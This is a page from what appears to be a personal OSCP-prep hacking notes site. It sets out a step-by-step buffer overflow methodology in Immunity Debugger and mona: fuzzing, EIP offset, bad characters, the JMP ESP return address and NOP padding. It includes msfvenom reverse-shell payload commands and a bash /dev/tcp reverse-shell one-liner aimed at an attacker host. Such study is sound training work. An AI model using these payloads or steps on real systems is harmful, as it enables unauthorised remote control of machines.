💎
kashz-jewels
  • kashz jewels
  • about kashz
  • oscp exam review
  • pnpt exam review
  • certification exam
  • c2 frameworks
  • kashz-kali
  • OS-LINUX
    • basic
    • linux-enumeration
      • enumeration auto
      • enumeration manual
    • linux-privilege-escalation
      • socat shells
      • sudo su styles
      • dirtyc0w
  • OS-WINDOWS
    • basic
    • windows-enumeration
      • enumeration auto
      • enumeration manual
      • enumeration tools
    • windows-privilege-escalation
      • privesc tools
      • steal NTLM creds
      • socat shells
      • beef browser exploitation
    • windows-post-exploitation
      • dump SAM SYSTEM
      • RDP tools
    • windows-bypass-uac
      • fodhelper
    • windows meterpreter
  • SHELLCODES
    • shells
    • windows shells
  • ACTIVE-DIRECTORY
    • active directory 101
    • kerberos 101
    • asrep roasting
    • kerberoasting
    • powerview.ps1
    • ad module
    • bloodhound
    • golden silver passing ticket
    • group policy management
    • dcsync
    • kerberos backdoor
    • mitm6
    • smb relay ntlmrelayx
    • responder
    • zero logon exploit
    • untested tools
  • OSINT
    • osint
  • BUFFER OVERFLOW GUIDE
    • exploit.py
    • fuzzer.py
    • methodology
  • HASH-n-CRACK
    • crackmapexec
    • hash identifier
    • hashcat
    • hydra
    • john the ripper
    • medusa
    • ncrack
    • rsa
  • TRICKS
    • .mdb file
    • 403 forbidden waf bypass
    • archive, unarchive
    • asp.net server
    • awscli
    • bash scripting
    • bypass bash restrictions
    • curl
    • ffuf wfuzz feroxbuster gobuster
    • file modification
    • git commands
    • git repo analysis
    • http request smuggling
    • json web token (jwt)
    • kali exploit compilation
    • kali multi-network adapters
    • local discovery
    • login bypass
    • magic bytes
    • nmap
    • office document analysis and exploitation
    • openvpn
    • pgp gpg cheatsheet
    • php wrappers, LFI
    • port forwarding
    • port knocking
    • post upload file
    • share files
    • ssh tunnel
    • subnet scan
    • ssh
    • wget
    • wifi
    • windows AppLocker bypass
    • wordlists
    • xss steal cookie
  • PROTOCOLS
    • dns :53
    • epmd :4369
    • ftp :21
    • ident :113
    • imap :143 :993
    • ipsec ike-vpn :500/udp
    • irc
    • ldap :389 :636 :3268 :3269
    • rpc
    • smb :135 :139 :445
    • smtp :25
    • subversion svn :3690
    • tftp :69
  • ATTACKS
    • .hta exploit
    • network scripts
    • print nightmare
    • ssrf
    • xml external entity XXE
  • CHEATSHEET
    • docker
    • drupal
    • gitlab rails
    • impacket guide
    • itemir/apache2fa
    • jenkins
    • jinja2 flask template injection
    • mimikatz
    • powershell
    • redis
    • sqli oracle odat
    • sqli basic
    • sqli influxql
    • sqli mongo
    • sqli ms-sql
    • sqli mysql
    • sqli oracle-sql
    • sqli postgres-sql
    • telnet
    • webdav
    • wordpress
  • SERVICES
    • achat
    • adminLTE
    • adminer.php
    • comment system
    • amanda
    • apache
    • apache exploits
    • apphp microblog
    • arj
    • azure cloud
    • b2evolution
    • bigtree cms
    • bludit cms
    • booked scheduler
    • cacti
    • centreon
    • chef knife
    • cloudMe
    • cms made simple
    • cmsmini
    • coldfusion
    • corehttp
    • cs cart
    • cse online bookstore
    • cuppa cms
    • cutenews cms
    • distccd (DistCC Daemon)
    • docker
    • dolphin2 cms
    • dosbox
    • drupal
    • elastic freepbx
    • elasticsearch kibana
    • epmd
    • exim
    • fail2ban
    • ftp exploits
    • fudforum
    • gitlab community edition
    • gunicorn
    • gym management system
    • h2 database
    • hp power manager
    • iis
    • james remote admin tool
    • jenkins exploits
    • katris
    • koken cms
    • ladon framework
    • laravel
    • lxd
    • magento
    • manage engine applications manager
    • manage engine service desk plus
    • mantis bugtracker
    • monstra cms
    • msfvenom apk
    • mysql exploit
    • nagios xi
    • network video monitoring system
    • nextcloud
    • nginx
    • nodebb
    • nostromo
    • nsclient
    • nsupdate
    • openNetAdmin ona
    • opendocman
    • openemr
    • opensmtpd
    • osclass
    • orient-db-server
    • otrs open ticket request system
    • ovidentia
    • pfsense
    • php file vault
    • php powerbrowse
    • php
    • phpliteadmin
    • phpmyadmin
    • phreebooks bizuno
    • plantronics hub
    • postfix smtp
    • postgres
    • python2 python3
    • quick cms
    • rabbitmq
    • raspAP
    • rconfig management
    • redis exploits
    • rejetto httpfileserver
    • remote-mouse
    • responsive filemanager
    • saltstack
    • sendmail
    • simple php photo gallery
    • small crm
    • smartermail
    • smartstore.net
    • smb exploits
    • sonatype nexus
    • splunk universal forwarder
    • ssh exploits
    • strapi cms
    • subrion cms
    • sudo
    • teamviewer
    • tmux
    • tomcat
    • umbraco
    • unifi video
    • unreal irc
    • usbcreator
    • vtiger crm
    • webcalendar
    • webmin :10000
    • werkzeug httpd
    • windows UsoSvc service
    • windows exploits
    • windows iot core
    • windows token exploits
    • wise care 365, wisebootassistant
    • wordpress plugin exploits
    • xampp
    • yaml
    • yum
    • zabbix
    • zenphoto cms
    • zookeeper exhibitor
Powered by GitBook
On this page
  • methodology
  • METHOD 1: Spiking (finding the crash)
  • METHOD 2: Spiking (finding the crash)
  • Finding OFFSET and EIP
  • Finding BadChars using !mona
  • Finding JMP using !mona
  • Generate msfvenom Payload
  • Prepend NOPs (\x90)
  • Manual Process
  • Finding BadChars manually
  • Finding JMP manually

Was this helpful?

  1. BUFFER OVERFLOW GUIDE

methodology

methodology

NOTE: for OSCP prep, you can skip the METHOD_1: SPIKING section

  1. Run Immunity debugger as administrator

  2. Attach the vulnerable service to Immunity debugger

  3. Configure Mona working folder using !mona config -set workingfolder c:\kashz

METHOD 1: Spiking (finding the crash)

  • https://www.kali.org/tools/spike/

  • https://resources.infosecinstitute.com/topic/intro-to-fuzzing/

NOTE: there could be multiple buffers in the vulnerable service, we need to confirm which buffer is vulnerable.

  • ./generic_send_tcp IP PORT SPIKE_SCRIPT SKIPVAR SKIPSTR

    • use SKIPVAR=0 SKIPSTR=0 to fuzz from beginning.

file: spike_script_example.spk

s_readline();
s_string("to-send-something? ");
s_string_variable("0");

METHOD 2: Spiking (finding the crash)

NOTE: you can modify the fuzzer.py to send a specific number of bytes and confirm crash.

  1. Run fuzzer.py and note the crash byte number

Finding OFFSET and EIP

  1. Generate pattern 400 bytes more than crash using msf: msf-pattern_create -l <number>

  2. set PAYLOAD = <generated-alue>

  3. Run exploit.py and find offset

    1. Using mona: !mona findmsp -distance <EIP>. Should show in log windows as EIP contains normal pattern : 0x6f43396e (offset 1978)

    2. [OR] using msf: msf-pattern_offset -l <number> -q <EIP>

  4. set OFFSET = value, set PAYLOAD = "", set RETURN = iiii value of 0x69696969.

  5. Run exploit.py

  6. Program (should) crash with EIP = 69696969

Finding BadChars using !mona

  1. Generate byte-array using mona excluding the \x00 null byte using !mona bytearray -cpb "\x00"

  2. set PAYLOAD = ( generated-byte-array )

  3. Run exploit.py

  4. Note ESP and find barChar using !mona compare -f C:\kashz\bytearray.bin -a <ESP_address>

  5. Remove 1st badChar from mona byte-array and generate new !mona bytearray -cpb "\x00\xXX"

  6. Remove the badChar from PAYLOAD in exploit.py

  7. Continue steps 3-6 until mona memory corruption log output says STATUS = UNMODIFIED

Finding JMP using !mona

Note: ALL badChars are needed to find the JMP instruction.

  1. Locate all JMP ESP using !mona jmp -r esp -cpb "\x00\xXX"

  2. Select the one, for which ASLR and other security protections are FALSE.

  3. Windows requires little endian style. So,

    1. if JMP instruction is 0x12345678.

    2. Take 2 letter from right-to-left and form return address

    3. return address is \x78\x56\x34\x12

    4. set RETN = \x78\x56\x34\x12 in exploit.py

Generate msfvenom Payload

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "badChars" -f c
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "badChars" -f c

# windows under linux (wine)
bash -i >& /dev/tcp/IP/PORT 0>&1

set PAYLOAD = ( payload )

Prepend NOPs (\x90)

NOTE: try 32 if 16 does not work.

Usually an encoder will be used to generate the msfvenom payload which requires memory space to unpack. set PADDING = "\x90" * 16 in exploit.py

Manual Process

Finding BadChars manually

If by any chance, mona is adding new badChars after every removal of possible badChar, time to do it manually. Follow the same process but instead of mona to check for badChar use the following method.

  1. (top-menu option) View > CPU window > (top right register pane) right-click ESP > follow dump

  2. (bottom left hexdump pane) same CPU windows - see all bad chars in line

  3. read thoroughly and check if all byte-array-chars are in order.

    1. If any char is skipped or missing - it is a badChar

    2. If byte-array-chars are missing after a specific char - that is a badChar

    3. Remove one char at a time until you reach the last \0xff.

Finding JMP manually

Note: ALL badChars are needed to find the JMP instruction.

  1. view > CPU window

  2. (top left pane) right click > Search for > All Commands in all modules > JMP ESP > search

  3. Choose JMP Address with Green color and module name (as the file running)

  4. Follow the above process to create little endian style return address

[OR]

  1. use !mona modules.

    1. Find a module that is being loaded with protection settings as False.

    2. use !mona find -s "\xff\xe4" -m MODULE_NAME

      1. JMP ESP == FFE4 (in assembly)

Previousfuzzer.pyNextcrackmapexec

Last updated 3 years ago

Was this helpful?